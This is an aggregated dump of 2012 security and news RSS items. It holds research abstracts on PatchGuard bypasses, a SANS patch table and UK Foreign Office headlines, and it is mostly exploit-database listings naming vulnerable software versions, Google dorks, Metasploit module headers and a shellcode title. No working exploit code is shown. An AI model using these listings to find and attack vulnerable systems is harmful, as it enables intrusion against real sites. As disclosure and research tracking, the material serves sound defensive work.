http://www.offensivecomputing.net/?q=node/feed Dear like-minded, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper, which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community, especially those dealing with malware analysis and, accordingly, investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is a so to say unintentional implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback, feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as "PatchGuard"), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public ("PatchGuard 3"). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing with (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> Power to the People and the Coming AppSec Revolution

http://www.veracode.com/blog/?feed=rss2 When the revolution comes, the first up against the firewall will be your business partners, along with every other third party that provides you with software. It used to be that you could call for more secure software from individual vendors, and Microsoft heeded that call, for example with its push for trustworthy computing starting in 2002. But today we're more dependent on software than ever, and more interconnected than ever; we rise and fall by the security of our associates.

==> Possible Root Compromise of Greatandhra.com

http://blog.scansafe.com/journal/rss.xml A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339. The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018). Successful exploitation leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website. Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained. First encounters resulting from this attack began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)... are installed on the system where you are performing a penetration test, isn't it? I have decided to put up for sale, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Former Windows Vista hacker now hardening OS X, iOS at Apple

http://feeds.arstechnica.com/arstechnica/security?format=xml "UNIX head" Kristin Paget now works for Apple's Core OS Security team.

==> Google, Microsoft, PayPal, other Romanian sites hijacked by DNS hackers

http://feeds.arstechnica.com/arstechnica/security?format=xml Incident is one of several DNS hacks to strike in recent weeks.

==> Multipurpose Necurs Trojan infects over 83,000 computers

http://feeds.feedburner.com/HelpNetSecurity The polyvalent Necurs malware family has been wreaking havoc in November by infecting over 83,000 unique computers - and those are only the ones detected by Microsoft's solutions! The Necurs Trojan ...

==> Microsoft IE execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss Microsoft IE 7, 8, 9

==> Microsoft IE 8 execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss Microsoft IE 8

==> Microsoft Windows RDP PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss Microsoft Windows XP, 2003, Vista, 7, 2008

==> Microsoft Windows RDP Remote Code Execution PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss Microsoft Windows XP, 2003, Vista, 7, 2008

==> Microsoft December 2012 Black Tuesday Update - Overview, (Tue, Dec 11th)

http://isc.sans.org/rssfeed_full.xml Overview of the December 2012 Microsoft patches and their status.

# | Affected | Contra Indications - KB | Known Exploits | Microsoft rating(**) | ISC rating(*) clients | ISC rating(*) servers
MS12-077 Internet Explorer Cumulative Patch (Replaces MS12-063, MS12-071) | Internet Explorer 9/10: CVE-2012-2545, CVE-2012-4781, CVE-2012-4782, CVE-2012-4787 | KB 2761465 | No | Severity: Critical, Exploitability: 1 | Critical | Critical
MS12-078 Windows Kernel Mode Drivers Remote Execution (Replaces MS12-032, MS12-075) | Kernel mode drivers: CVE-2012-2556, CVE-2012-4786 | KB 2783534 | No | Severity: Critical, Exploitability: 1 | Critical | Important
MS12-079 Microsoft Word RTF Data Remote Code Execution (Replaces MS12-064) | Word: CVE-2012-2539 | KB 2780642 | No | Severity: Critical, Exploitability: 1 | Critical | N/A
MS12-080 Windows Exchange Server Remote Code Execution (Replaces MS12-058) | Exchange Server: CVE-2012-3214, CVE-2012-3217, CVE-2012-4791 | KB 2784126 | Yes | Severity: Critical, Exploitability: 1 | N/A | Critical
MS12-081 Windows File Handling Remote Code Execution (Replaces MS07-035, MS11-063) | Windows: CVE-2012-4774 | KB 2758857 | No | Severity: Critical, Exploitability: 1 | Critical | Critical
MS12-082 DirectPlay Remote Code Execution | DirectPlay: CVE-2012-1537 | KB 2770660 | No | Severity: Important, Exploitability: 1 | Critical | Important
MS12-083 IP-HTTPS Security Feature Bypass | Direct Access: CVE-2012-2549 | KB 2765809 | No | Severity: Important, Exploitability: 1 | Important | Important

We will update issues on this page for about a week or so as they evolve. We appreciate updates. US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY.

(*): ISC rating. We use 4 levels:
PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
Critical: Anything that needs little to become interesting for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
Important: Things where more testing and other measures can help.
Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.

The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work. The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role. Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved. All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

-- Post suggestions or comments in the section below or send us any questions or comments in the contact form --
John Bambenek bambenek /at/ gmail.com Bambenek Consulting
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> New Orkut – Upload Images/Songs/Videos in Profile

http://www.thehackerslibrary.com/?feed=rss New Orkut! The latest Buzz in the E-World. But now almost all have it. And it's still fresh, owing to the fact that it's like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write [...]

==> Get rid of Windows Vista Administrative Password

http://www.thehackerslibrary.com/?feed=rss Method 1: System Restore This only works in cases where you changed your password to something new and then forgot it or deleted a user account by accident. In order for this to work, there must be a System Restore point at which a logon was successful for the problem account. Also, this is not [...]

==> Static DLL Injection

http://www.thehackerslibrary.com/?feed=rss INTRODUCTION DEFINING DLL According to Microsoft, “A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in [...]

==> Microsoft’s WorldWide Telescope: Virtual telescope opens night sky

http://www.thehackerslibrary.com/?feed=rss Where science meets imagination! Microsoft's WorldWide Telescope Released. May 12th, 2008 Any Star Wars, Star Trek fan (like me) knows that space travel is not always easy, but Microsoft wants to make traveling the final frontier as simple as turning on your computer. Joining Google Sky and Stellarium is Microsoft's entrant to the [...]

==> [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011)

http://www.infosecnews.org/isn.rss InfoSec News: [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011): Forwarded from: ACM CCS 2011 <acmccs2011 (at) gmail.com> Apologies for multiple copies of this announcement.

The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security.

Paper Submission Process: Submissions must be made by the deadline of May 6, 2011, through the website: http://www.easychair.org/conferences/?conf=ccs2011 The review process will be carried out in two phases and authors will have an opportunity to comment on the first-phase reviews. Authors will be notified of the first-phase reviews on Monday, June 20, 2011 and can send back their comments by Thursday, June 23, 2011. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference.

Paper Format: Submissions must be at most 10 pages in double-column ACM format (note: pages must be numbered) excluding the bibliography and well-marked appendices, and at most 12 pages overall. Submissions must NOT be anonymized. Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits.

Tutorial Submissions: Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 24, 2011. The guidelines for tutorial proposals can be found on the website.

Important Dates
- Paper submission due: Friday, May 6, 2011 (23:59 UTC - 11)
- First round reviews communicated to authors: Monday, June 20, 2011
- Author comments due on: Thursday, June 23, 2011 (23:59 UTC - 11)
- Acceptance notification: Friday, July 15, 2011
- Final papers due: Thursday, August 11, 2011

GENERAL CHAIR: Yan Chen (Northwestern University, USA)
PROGRAM CHAIRS: George Danezis (Microsoft Research, UK), Vitaly Shmatikov (University of Texas at Austin, USA)
PROGRAM COMMITTEE: Michael Backes (Saarland University and MPI-SWS, Germany), Bruno Blanchet (INRIA, Ecole Normale Superieure, and CNRS, France), Dan Boneh (Stanford University, USA), Nikita Borisov (University of Illinois at Urbana-Champaign, USA), Herbert Bos (VU, Netherlands), Srdjan Capkun (ETHZ, Switzerland), Avik Chaudhuri (Adobe Advanced Technology Labs, USA), Shuo Chen (Microsoft Research, USA), Manuel Costa (Microsoft Research, UK), Anupam Datta (CMU, USA), Stephanie Delaune (CNRS and ENS-Cachan, France), Roger Dingledine (The Tor Project, USA), Orr Dunkelman (University of Haifa and Weizmann Institute, Israel), Ulfar Erlingsson (Google, USA), Nick Feamster (Georgia Tech, USA), Bryan Ford (Yale University, USA), Cedric Fournet (Microsoft Research, UK), Paul Francis (MPI-SWS, Germany), Michael Freedman (Princeton University, USA), Guofei Gu (Texas A&M University, USA), Nicholas Hopper (University of Minnesota, USA), Collin Jackson (CMU Silicon Valley, USA), Markus Jakobsson (Paypal, USA), Jaeyeon Jung (Intel Labs Seattle, USA), Apu Kapadia (Indiana University Bloomington, USA), Jonathan Katz (University of Maryland, USA), Stefan Katzenbeisser (TU Darmstadt, Germany), Arvind Krishnamurthy (University of Washington, USA), Christopher Kruegel (University of California, Santa Barbara, USA), Ralf Kuesters (University of Trier, Germany), Ninghui Li (Purdue University, USA), Benjamin Livshits (Microsoft Research, USA), Heiko Mantel (TU Darmstadt, Germany), John Mitchell (Stanford University, USA), Fabian Monrose (University of North Carolina at Chapel Hill, USA), Steven Murdoch (University of Cambridge, UK), David Naccache (Ecole Normale Superieure, France), Arvind Narayanan (Stanford University, USA), Kenny Paterson (Royal Holloway, University of London, UK), Niels Provos (Google, USA), Mike Reiter (University of North Carolina at Chapel Hill, USA), Thomas Ristenpart (University of Wisconsin, USA), Hovav Shacham (University of California, San Diego, USA), Adam Smith (Pennsylvania State University, USA), Anil Somayaji (Carleton University, Canada), Francois-Xavier Standaert (UCL, Belgium), Eran Tromer (Tel Aviv University, Israel), Leendert Van Doorn (AMD, USA), Paul Van Oorschot (Carleton University, Canada), Bogdan Warinschi (University of Bristol, UK), Brent Waters (University of Texas at Austin, USA), Robert Watson (University of Cambridge, United Kingdom), Xiaowei Yang (Duke University, USA), Haifeng Yu (National University of Singapore, Singapore)

==> Championing Britain through commercial and economic diplomacy

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague tells British diplomats they must intensify work to champion the UK as a destination for foreign investment.

==> Foreign Secretary remarks at the Friends of Syria meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Foreign Secretary William Hague has outlined the immediate responsibilities for the Friends of Syria at the meeting in Marrakesh.

==> Government publishes Afghanistan progress report

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Foreign Secretary William Hague has updated parliament on progress in Afghanistan during October 2012.

==> Parental Child Abduction is a worldwide problem

http://feeds.feedburner.com/FcoLatestNewsRssFeed New figures reveal that the number of parental child abduction cases dealt with by the Foreign Office has risen by 88% in just under a decade.

==> Foreign Secretary condemns DPRK’s satellite launch

http://feeds.feedburner.com/FcoLatestNewsRssFeed Commenting on the launch of DPRK’s satellite, the Foreign Secretary, William Hague, said:

==> UK calls for an immediate return to civilian rule in Mali

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Office Minister for Africa Mark Simmonds has tonight underlined his concern over the situation in Mali and called for an immediate return to civilian rule.

==> Piracy Ransoms Task Force publishes recommendations

http://feeds.feedburner.com/FcoLatestNewsRssFeed Today the Piracy Ransoms Task Force presented its conclusions on how to work together to reduce the threat of piracy and ultimately ransom payments to pirates.

==> Foreign Secretary met the King of Jordan

http://feeds.feedburner.com/FcoLatestNewsRssFeed Today Foreign Secretary William Hague met His Majesty King Abdullah of Jordan and the Jordanian Foreign Minister Nasser Judeh.

==> The Foreign Secretary to attend Friends of Syria meeting in Marrakesh.

http://feeds.feedburner.com/FcoLatestNewsRssFeed On 12 December representatives from over 130 countries and international organisations will meet for the fourth Friends of Syria meeting to support the Syrian National Coalition and the Syrian people.

==> Britain and the Philippines: Partners for Prosperity

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Office Minister Hugo Swire has given a speech about the growing trade partnership between the UK and the Philippines.

==> Snare For Linux Cross Site Request Forgery

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Snare For Linux Cross Site Request Forgery Risk: Low Text:Snare for Linux Cross-Site Request Forgery I. BACKGROUND - Snare for Linux

==> Snare For Linux Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Snare For Linux Cross Site Scripting Risk: Low Text:Snare for Linux Cross-Site Scripting via Log Injection I. BACKGROUND - Snare for

==> SimpleInvoices 2011.1 Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: SimpleInvoices 2011.1 Cross Site Scripting Risk: Low Text:Overview SimpleInvoices 2011.1 is vulnerable to Cross-site Scripting (XSS).

==> gpEasy CMS XSS Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: gpEasy CMS XSS Vulnerability Risk: Low Text:1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

==> Axway Directory Traversal

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Axway Directory Traversal Risk: Medium Text:Secure Transport Path Traversal Vulnerability Public Disclosure Date: November 11, 2012

==> HP Data Protector DtbClsLogin Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: HP Data Protector DtbClsLogin Buffer Overflow Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> MyBB Profile Blog plugin multiple vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB Profile Blog plugin multiple vulnerabilities Risk: Medium Text:# Exploit Title: MyBB Profile Blog plugin multiple vulnerabilities. # Google Dork: inurl:member.php intext:"Profile

==> MyBB plugin Bank v3 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB plugin Bank v3 SQL Injection Risk: Medium Text:# Exploit Title: MyBB plugin SQLi 0day # Exploit Author: Red_Hat [NullSec] #

==> Joomla Jooproperty SQL Injection &Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Jooproperty SQL Injection &Cross Site Scripting Risk: Medium Text: 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

==> Nagios Core 3.4.3 Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Nagios Core 3.4.3 Buffer Overflow Risk: High Text:history.cgi is vulnerable to a buffer overflow due to the use of sprintf with user

==> Android Kernel 2.6 Denial Of Service

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Android Kernel 2.6 Denial Of Service Risk: Medium Text:# Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 #

==> MyBB Kingchat Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB Kingchat Cross Site Scripting Risk: Low Text:Exploit Title: MyBB 'kingchat' chat-box plugin. Google Dork: inurl:/kingchat.php?

==> DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira

==> FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: FreeVimager 4.1.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # FreeVimager 4.1.0 <= WriteAV Arbitrary Code

==> Dolphin3D web browser ActiveX Remote Command Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Dolphin3D web browser ActiveX Remote Command Execution Risk: High Text:## # # Dolphin3D web browser ActiveX Remote Command Execution # #

==> FreeFloat FTP Server Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: FreeFloat FTP Server Buffer Overflow Risk: High Text:#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command

==> Cisco DPC2420 Cross Site Scripting & File Disclosure

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Cisco DPC2420 Cross Site Scripting & File Disclosure Risk: High Text:## ## -> Title: DPC2420 Multiple vulnerabilities ## -> Author:

==> Havalite 1.1.7 Cross Site Scripting & Shell Upload

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Havalite 1.1.7 Cross Site Scripting & Shell Upload Risk: High Text:# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

==> Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability Risk: High Text:: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability : # Date : 08

==> Pixie v1.04 blog Add Admin

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Pixie v1.04 blog Add Admin Risk: High Text: Pixie v1.04 blog Add Admin ## # Vendor :

==> KeenLook SQL injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: KeenLook SQL injection Vulnerability Risk: Medium Text:# Exploit Title: KeenLook sql injection Vulnerability # Date: 05/10/2012 #

==> Centrify Deployment Manager v2.1.0.283 Local Root

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Centrify Deployment Manager v2.1.0.283 Local Root Risk: High Text:Centrify Deployment Manager v2.1.0.283 local root 12/7/2012

==> Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling Risk: High Text:Centrify Deployment Manager v2.1.0.283 While at a training session for centrify, I noticed poor handling of files in

==> TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

http://feeds.feedburner.com/securityalert_database?format=xml Topic: TVMOBiLi Media Server 2.1.0.3557 Denial Of Service Risk: Medium Text:Advisory ID: HTB23120 Product: TVMOBiLi media server Vendor:

==> Achievo 1.4.5 Cross Site Scripting & SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Achievo 1.4.5 Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23126 Product: Achievo Vendor: www.achievo.org

==> Splunk 5.0 Custom App Remote Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Splunk 5.0 Custom App Remote Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> WordPress Simple Gmail Login Path Disclosure

http://feeds.feedburner.com/securityalert_database?format=xml Topic: WordPress Simple Gmail Login Path Disclosure Risk: Low Text: # Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace

==> ClipBucket 2.6 Revision 738 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ClipBucket 2.6 Revision 738 SQL Injection Risk: Medium Text:Advisory ID: HTB23125 Product: ClipBucket Vendor: clip-bucket.com

==> FreeFloat FTP Server Arbitrary File Upload

http://feeds.feedburner.com/securityalert_database?format=xml Topic: FreeFloat FTP Server Arbitrary File Upload Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> Maxthon3 about:history XCS Trusted Zone Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Maxthon3 about:history XCS Trusted Zone Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be

==> VLC Media Player 2.0.4 Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: VLC Media Player 2.0.4 Buffer Overflow Risk: High Text:Title : VLC media player 2.0.4 buffer overflow POC Version : 2.0.4 Twoflower Date

==> Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability Risk: Medium Text:# Exploit Title: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability # Date: 12/05/2012 # Exploit Author: Woody Hughes

==> IBM System Director Agent DLL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: IBM System Director Agent DLL Injection Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> m0n0wall 1.33 Cross Site Request Forgery

http://feeds.feedburner.com/securityalert_database?format=xml Topic: m0n0wall 1.33 Cross Site Request Forgery Risk: Low Text: # # Exploit Title: m0n0wall 1.33 CSRF Remote root Access # Date:

==> Maxthon / Avant Browser XCS / Same Origin Bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Maxthon / Avant Browser XCS / Same Origin Bypass Risk: Medium Text:Hi, Below you can find a short summary of discovered vulnerabilities in Maxthon and Avant browsers. Such vulnerabilities

==> Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial

==> NVIDIA Install Application 2.1002.85.551 Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: NVIDIA Install Application 2.1002.85.551 Buffer Overflow Risk: High Text:

==> web - gpEasy CMS - XSS Vulnerability

http://www.1337day.com/rss

==> web - WordPress ABC Test Plugin directory traversal

http://www.1337day.com/rss

==> web - WordPress ABC Test Plugin 0.1 Cross Site Script XSS

http://www.1337day.com/rss

==> web - MyBB Bank-v3 Plugin SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - WordPress 3.5 multiple path disclosure vulnerabilities

http://www.1337day.com/rss

==> dos / - Nagios Core 3.4.3 Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> local - Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection

http://www.1337day.com/rss

==> remote - Snare Agent Linux Password Disclosure / CSRF Vulnerabilities

http://www.1337day.com/rss

==> web - MyBB Profile Blogs Plugin 1.2 Multiple Vulnerabilities

http://www.1337day.com/rss

==> remote - HP Data Protector DtbClsLogin Buffer Overflow

http://www.1337day.com/rss

==> web - Joomla Component com_jooproperty Sql Injection / Xss Vulnerability

http://www.1337day.com/rss

==> web - WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

http://www.1337day.com/rss

==> remote - Dolphin3D 1.52 / 1.60 Command Execution Vulnerability

http://www.1337day.com/rss

==> local - DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> local - FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> remote - Nagios XI Network Monitor Graph Explorer Component Command Injection

http://www.1337day.com/rss

==> dos / - Android Kernel 2.6 Local DoS Crash PoC

http://www.1337day.com/rss

==> dos / - Sumatra 2.1.1/MuPDF 1.0 Integer Overflow

http://www.1337day.com/rss

==> web - MyBB KingChat Plugin Persistent XSS Vulnerability

http://www.1337day.com/rss

==> web - Havalite v1.1.7 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Cisco DPC2420 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Jahia 5.x CSRF Exploit

http://www.1337day.com/rss

==> web - vBulletin Announcements Cookie Steal Vulnerability

http://www.1337day.com/rss

==> web - Jahia Enterprise v6.6.0.0 CSRF Vulnerability

http://www.1337day.com/rss

==> local - Geany <=1.22 Local Code injection Vulnerability

http://www.1337day.com/rss

==> web - KeenLook sql injection Vulnerability

http://www.1337day.com/rss

==> local - Steam Linux Closed Beta bypass authorization

http://www.1337day.com/rss

==> web - Pixie v1.04 blog Add Admin Vulnerability

http://www.1337day.com/rss

==> web - Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability

http://www.1337day.com/rss

==> remote - FreeFloat FTP Server Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> remote - Maxthon3 about:history XCS Trusted Zone Code Execution

http://www.1337day.com/rss

==> remote - Splunk 5.0 Custom App Remote Code Execution

http://www.1337day.com/rss

==> local - Centrify Deployment Manager 2.1.0.283 Local Root Vulnerability

http://www.1337day.com/rss

==> dos / - TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

http://www.1337day.com/rss

==> web - ClipBucket 2.6 Revision 738 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Achievo 1.4.5 Cross Site Scripting / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> remote - Free Float FTP Server Remote Command Execution USER Command Buffer Overflow

http://www.1337day.com/rss

==> web - IPBoard 3.x.x/3.4 Full Path Disclosure

http://www.1337day.com/rss

==> web - m0n0wall 1.33 Cross Site Request Forgery Vulnerability

http://www.1337day.com/rss

==> remote - IBM System Director Agent DLL Injection Vulnerability

http://www.1337day.com/rss

==> local - RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC

http://www.1337day.com/rss

==> dos / - VLC media player 2.0.4 buffer overflow PoC

http://www.1337day.com/rss

==> dos / - NVIDIA Install Application 2.1002.85.551 Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> [shellcode] - Linux/x86 - execve /bin/sh shellcode 23 bytes

http://www.1337day.com/rss

==> remote - Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability

http://www.1337day.com/rss

==> web - vBulletin 4.x/5.x multiple Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Moodle 1.9.14.2 Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Wordpress 3.4.2 JetPack Full Path Disclosure

http://www.1337day.com/rss

